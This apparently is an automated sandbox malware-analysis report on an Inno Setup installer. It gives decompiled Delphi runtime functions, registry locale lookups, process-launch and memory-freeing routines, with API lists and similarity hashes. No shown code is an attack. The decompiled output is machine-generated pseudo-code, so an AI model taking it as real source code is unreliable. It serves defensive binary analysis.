                                                            0x0040b0a3
                                                            0x0040b0aa
                                                            0x0040b0ac
                                                            0x0040b0bd
                                                            0x0040b0ca
                                                            0x0040b0d1
                                                            0x0040b0d8
                                                            0x0040b0dc
                                                            0x0040b0dc
                                                            0x0040b0d8
                                                            0x0040b0e3
                                                            0x0040b0e6
                                                            0x0040b0e9
                                                            0x0040b0f6
                                                            0x0040b103

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                            • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                              • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                              • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                            • String ID:
                                                            • API String ID: 3216391948-0
                                                            • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                            • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                            • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                            0x0040aefd
                                                            0x0040aefe
                                                            0x0040af04
                                                            0x0040af0b
                                                            0x0040af0c
                                                            0x0040af11
                                                            0x0040af14
                                                            0x0040af27
                                                            0x0040af34
                                                            0x0040af37
                                                            0x0040af37
                                                            0x0040af3e
                                                            0x0040af41
                                                            0x0040af44
                                                            0x0040af51

                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                            • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                            • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                            0x0040ab19
                                                            0x0040ab1b
                                                            0x0040ab22
                                                            0x0040ab24
                                                            0x0040ab2a
                                                            0x0040ab31
                                                            0x0040ab32
                                                            0x0040ab37
                                                            0x0040ab3a
                                                            0x0040ab41
                                                            0x0040ab6d
                                                            0x0040ab43
                                                            0x0040ab51
                                                            0x0040ab51
                                                            0x0040ab7a
                                                            0x0040ad27
                                                            0x0040ad29
                                                            0x0040ad2c
                                                            0x0040ad2f
                                                            0x0040ad3c
                                                            0x0040ab80
                                                            0x0040ab82
                                                            0x0040ab9a
                                                            0x0040aba1
                                                            0x0040ac41
                                                            0x0040ac43
                                                            0x0040ac44
                                                            0x0040ac49
                                                            0x0040ac4c
                                                            0x0040ac5a
                                                            0x0040ac7b
                                                            0x0040acca
                                                            0x0040acd4
                                                            0x0040acec
                                                            0x0040acf6
                                                            0x0040acf6
                                                            0x0040ac7d
                                                            0x0040ac85
                                                            0x0040ac9f
                                                            0x0040aca9
                                                            0x0040aca9
                                                            0x0040acfd
                                                            0x0040ad00
                                                            0x0040ad03
                                                            0x0040ad0c
                                                            0x0040ad11
                                                            0x0040ad11
                                                            0x0040ad1f
                                                            0x0040aba7
                                                            0x0040abbc
                                                            0x0040abc3
                                                            0x00000000
                                                            0x0040abc5
                                                            0x0040abda
                                                            0x0040abe1
                                                            0x00000000
                                                            0x0040abe3
                                                            0x0040abf8
                                                            0x0040abff
                                                            0x00000000
                                                            0x0040ac01
                                                            0x0040ac16
                                                            0x0040ac1d
                                                            0x00000000
                                                            0x0040ac1f
                                                            0x0040ac34
                                                            0x0040ac3b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040ac3b
                                                            0x0040ac1d
                                                            0x0040abff
                                                            0x0040abe1
                                                            0x0040abc3
                                                            0x0040aba1

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                            • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                            • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                            • API String ID: 2701450724-3496071916
                                                            • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                            • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                            • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x302cc
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x302cc
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d703c
				_t4 = _t26 + 0x20; // 0x415c9b
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d703c
				_t7 = _t28 + 0x24; // 0xcb000
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
				_push( *((intOrPtr*)(_t73 - 0x40)));
				_push( *0x4c1d84);
				_push(0x4b6680);
				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
				_push( *((intOrPtr*)(_t73 - 0x5c)));
				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
				_t36 =  *0x4c1d9c; // 0x0, executed
				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
				if( *0x4ba448 != 0xffffffff) {
					_t50 =  *0x4ba448; // 0x0
					E004AF60C(_t50);
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E004B6554);
				_t39 =  *0x4c1d88; // 0x0
				_t40 = E00405CE8(_t39);
				if( *0x4c1d9c != 0) {
					_t70 =  *0x4c1d9c; // 0x0
					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
				}
				if( *0x4c1d94 != 0) {
					_t47 =  *0x4c1d94; // 0x0
					_t40 = RemoveDirectoryW(E004084EC(_t47)); // executed
				}
				if( *0x4ba450 != 0) {
					_t46 =  *0x4ba450; // 0x302cc
					_t40 = DestroyWindow(_t46); // executed
				}
				if( *0x4c1d78 != 0) {
					_t41 =  *0x4c1d78; // 0x0
					_t60 =  *0x4c1d7c; // 0x1
					_t69 =  *0x426bb0; // 0x426bb4
					E00408D08(_t41, _t60, _t69);
					_t43 =  *0x4c1d78; // 0x0
					E0040540C(_t43);
					 *0x4c1d78 = 0;
					return 0;
				}
				return _t40;
			}
























                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a1
                                                            0x004b63a3
                                                            0x004b63a6
                                                            0x004b63d3
                                                            0x004b63da
                                                            0x004b63e0
                                                            0x004b6407
                                                            0x004b640c
                                                            0x004b6418
                                                            0x004b6423
                                                            0x004b642c
                                                            0x004b6431
                                                            0x004b6434
                                                            0x004b6438
                                                            0x004b643d
                                                            0x004b6440
                                                            0x004b6443
                                                            0x004b6447
                                                            0x004b644c
                                                            0x004b644f
                                                            0x004b6452
                                                            0x004b6463
                                                            0x004b6468
                                                            0x004b646b
                                                            0x004b6471
                                                            0x004b6479
                                                            0x004b647e
                                                            0x004b6489
                                                            0x004b6496
                                                            0x004b649b
                                                            0x004b64a7
                                                            0x004b64a9
                                                            0x004b64ae
                                                            0x004b64ae
                                                            0x004b64b5
                                                            0x004b64b8
                                                            0x004b64bb
                                                            0x004b64c0
                                                            0x004b64c5
                                                            0x004b64d1
                                                            0x004b64df
                                                            0x004b64e7
                                                            0x004b64e7
                                                            0x004b64f3
                                                            0x004b64f5
                                                            0x004b6500
                                                            0x004b6500
                                                            0x004b650c
                                                            0x004b650e
                                                            0x004b6514
                                                            0x004b6514
                                                            0x004b6520
                                                            0x004b6522
                                                            0x004b6527
                                                            0x004b652d
                                                            0x004b6533
                                                            0x004b6538
                                                            0x004b653d
                                                            0x004b6544
                                                            0x00000000
                                                            0x004b6544
                                                            0x004b6549

                                                            APIs
                                                              • Part of subcall function 0040E450: CreateWindowExW.USER32 ref: 0040E48F
                                                            • SetWindowLongW.USER32 ref: 004B641E
                                                              • Part of subcall function 00422BC4: GetCommandLineW.KERNEL32(00000000,00422C06,?,?,00000000,?,004B647E,004B6680,?), ref: 00422BDA
                                                              • Part of subcall function 004AF728: CreateProcessW.KERNEL32 ref: 004AF798
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004AF82C,00000000,004AF81C,00000000), ref: 004AF7AE
                                                              • Part of subcall function 004AF728: MsgWaitForMultipleObjects.USER32 ref: 004AF7C7
                                                              • Part of subcall function 004AF728: GetExitCodeProcess.KERNEL32 ref: 004AF7DB
                                                              • Part of subcall function 004AF728: CloseHandle.KERNEL32(?,?,004BA44C,00000001,?,00000000,000000FF,000004FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AF7E4
                                                            • RemoveDirectoryW.KERNEL32(00000000,004B6554), ref: 004B6500
                                                            • DestroyWindow.USER32(000302CC,004B6554), ref: 004B6514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                            • String ID: /SL5="$%x,%d,%d,$<pM$InnoSetupLdrWindow$STATIC
                                                            • API String ID: 3586484885-2916600167
                                                            • Opcode ID: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction ID: 04c90e22d0408fd8de4b79ff2beaee59f7a3a861a1d73b16261182ae62401715
                                                            • Opcode Fuzzy Hash: 3c021837c984efc67f9ad3a794955b0d04b23bc85077f6812c73bb0a86195aee
                                                            • Instruction Fuzzy Hash: EC416B74A002009FE754EBA9EC85B9A37B4EB85308F11453BE0059B2B6CB7CA851CB5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 91%
                                                            			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x4bb059; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00403C48();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
								if(_t65 == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x4bbaf0 - 0x13ffe0;
							if( *0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x4bbaf0 = 0x13ffe0;
								 *0x4bbaec = _t82;
								 *0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							 *0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}





























                                                            0x0040426c
                                                            0x0040426c
                                                            0x00404275
                                                            0x0040427b
                                                            0x00404364
                                                            0x00404367
                                                            0x00404454
                                                            0x00404455
                                                            0x00404458
                                                            0x00403cf8
                                                            0x00403cfa
                                                            0x00403cfc
                                                            0x00403d01
                                                            0x00403d04
                                                            0x00403d09
                                                            0x00403d0d
                                                            0x00403d13
                                                            0x00403d17
                                                            0x00403d1d
                                                            0x00403d39
                                                            0x00403d3d
                                                            0x00403d40
                                                            0x00403d40
                                                            0x00403d42
                                                            0x00403d4a
                                                            0x00403d57
                                                            0x00403d5c
                                                            0x00403d5e
                                                            0x00403d60
                                                            0x00403d63
                                                            0x00403d63
                                                            0x00403d65
                                                            0x00403d69
                                                            0x00403d6b
                                                            0x00403d6d
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6f
                                                            0x00000000
                                                            0x00403d6b
                                                            0x00403d1f
                                                            0x00403d27
                                                            0x00403d2e
                                                            0x00403d34
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d30
                                                            0x00403d2e
                                                            0x00403d73
                                                            0x00403d75
                                                            0x00403d7e
                                                            0x00403d87
                                                            0x00403d87
                                                            0x00403d8a
                                                            0x00403d9a
                                                            0x0040445e
                                                            0x00404463
                                                            0x00404463
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404281
                                                            0x00404281
                                                            0x00404283
                                                            0x00404285
                                                            0x004042e8
                                                            0x004042e8
                                                            0x004042ed
                                                            0x004042f1
                                                            0x00000000
                                                            0x00000000
                                                            0x004042f3
                                                            0x004042f5
                                                            0x004042fc
                                                            0x00000000
                                                            0x004042fe
                                                            0x00404302
                                                            0x00404307
                                                            0x00404308
                                                            0x00404309
                                                            0x0040430e
                                                            0x00404312
                                                            0x0040431c
                                                            0x00404321
                                                            0x00404322
                                                            0x00000000
                                                            0x00404322
                                                            0x00404312
                                                            0x00000000
                                                            0x004042fc
                                                            0x004042e8
                                                            0x00404287
                                                            0x00404287
                                                            0x00404287
                                                            0x00404287
                                                            0x0040428b
                                                            0x0040428e
                                                            0x004042bc
                                                            0x004042be
                                                            0x004042d3
                                                            0x004042d3
                                                            0x004042c0
                                                            0x004042c0
                                                            0x004042c3
                                                            0x004042c6
                                                            0x004042c9
                                                            0x004042cc
                                                            0x004042ce
                                                            0x004042d1
                                                            0x00000000
                                                            0x00000000
                                                            0x004042d1
                                                            0x004042d6
                                                            0x004042d8
                                                            0x004042da
                                                            0x004042dd
                                                            0x0040436d
                                                            0x00404370
                                                            0x00404372
                                                            0x00404374
                                                            0x00404375
                                                            0x00404377
                                                            0x00404328
                                                            0x00404328
                                                            0x0040432d
                                                            0x00404335
                                                            0x00000000
                                                            0x00000000
                                                            0x00404337
                                                            0x00404339
                                                            0x00404340
                                                            0x00000000
                                                            0x00404342
                                                            0x00404344
                                                            0x00404349
                                                            0x0040434e
                                                            0x00404356
                                                            0x0040435a
